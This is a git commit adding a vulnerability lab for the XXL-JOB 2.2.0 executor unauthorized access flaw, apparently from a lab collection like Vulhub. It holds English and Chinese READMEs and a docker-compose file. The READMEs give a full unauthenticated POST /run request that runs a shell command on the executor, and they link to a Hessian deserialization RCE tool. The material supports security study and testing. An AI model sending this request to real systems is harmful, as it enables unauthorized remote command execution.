first commit

xxl-job/unacc/README.md

@@ -0,0 +1,62 @@
+# XXL-JOB Executor Unauthorized Access
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+XXL-JOB is a distributed task scheduling platform with core design goals of rapid development, simple learning, lightweight, and easy extensibility. It is now open source and has been integrated into many companies' production lines, ready to use out of the box.
+
+XXL-JOB is divided into two parts: admin and executor, where the former is the backend management page and the latter is the task execution client. The executor has no authentication configured by default, allowing unauthorized attackers to execute arbitrary commands through the RESTful API.
+
+References:
+
+- <https://mp.weixin.qq.com/s/jzXIVrEl0vbjZxI4xlUm-g>
+- <https://landgrey.me/blog/18/>
+- <https://github.com/OneSourceCat/XxlJob-Hessian-RCE>
+
+## Environment Setup
+
+Execute the following command to start XXL-JOB version 2.2.0:
+
+```
+docker compose up -d
+```
+
+After the environment is started, you can access the management end (admin) at `http://your-ip:8080` and the client end (executor) at `http://your-ip:9999`.
+
+## Vulnerability Reproduction
+
+Send the following data packet to the client (executor) to execute commands:
+
+```
+POST /run HTTP/1.1
+Host: your-ip:9999
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
+Connection: close
+Content-Type: application/json
+Content-Length: 365
+
+{
+  "jobId": 1,
+  "executorHandler": "demoJobHandler",
+  "executorParams": "demoJobHandler",
+  "executorBlockStrategy": "COVER_EARLY",
+  "executorTimeout": 0,
+  "logId": 1,
+  "logDateTime": 1586629003729,
+  "glueType": "GLUE_SHELL",
+  "glueSource": "touch /tmp/success",
+  "glueUpdatetime": 1586699003758,
+  "broadcastIndex": 0,
+  "broadcastTotal": 0
+}
+```
+
+![](1.png)
+
+The command `touch /tmp/success` has been successfully executed:
+
+![](2.png)
+
+Additionally, for XXL-JOB versions below 2.2.0 that don't have a RESTful API, we can execute commands through [Hessian deserialization](https://github.com/OneSourceCat/XxlJob-Hessian-RCE).

xxl-job/unacc/README.zh-cn.md

@@ -0,0 +1,60 @@
+# XXL-JOB executor 未授权访问漏洞
+
+XXL-JOB是一个分布式任务调度平台，其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线，开箱即用。
+
+XXL-JOB分为admin和executor两端，前者为后台管理页面，后者是任务执行的客户端。executor默认没有配置认证，未授权的攻击者可以通过RESTful API执行任意命令。
+
+参考链接：
+
+- https://mp.weixin.qq.com/s/jzXIVrEl0vbjZxI4xlUm-g
+- https://landgrey.me/blog/18/
+- https://github.com/OneSourceCat/XxlJob-Hessian-RCE
+
+## 环境搭建
+
+执行如下命令启动2.2.0版本的XXL-JOB：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`即可查看到管理端（admin），访问`http://your-ip:9999`可以查看到客户端（executor）。
+
+## 漏洞复现
+
+向客户端（executor）发送如下数据包，即可执行命令：
+
+```
+POST /run HTTP/1.1
+Host: your-ip:9999
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
+Connection: close
+Content-Type: application/json
+Content-Length: 365
+
+{
+  "jobId": 1,
+  "executorHandler": "demoJobHandler",
+  "executorParams": "demoJobHandler",
+  "executorBlockStrategy": "COVER_EARLY",
+  "executorTimeout": 0,
+  "logId": 1,
+  "logDateTime": 1586629003729,
+  "glueType": "GLUE_SHELL",
+  "glueSource": "touch /tmp/success",
+  "glueUpdatetime": 1586699003758,
+  "broadcastIndex": 0,
+  "broadcastTotal": 0
+}
+```
+
+![](1.png)
+
+`touch /tmp/success`已成功执行：
+
+![](2.png)
+
+另外，低于2.2.0版本的XXL-JOB没有RESTful API，我们可以通过[Hessian反序列化](https://github.com/OneSourceCat/XxlJob-Hessian-RCE)来执行命令。

xxl-job/unacc/docker-compose.yml

@@ -0,0 +1,18 @@
+version: '2'
+services:
+ admin:
+   image: vulhub/xxl-job:2.2.0-admin
+   depends_on:
+    - db
+   ports:
+    - "8080:8080"
+ executor:
+   image: vulhub/xxl-job:2.2.0-executor
+   depends_on:
+    - admin
+   ports:
+    - "9999:9999"
+ db:
+   image: mysql:5.7
+   environment: 
+    - MYSQL_ROOT_PASSWORD=root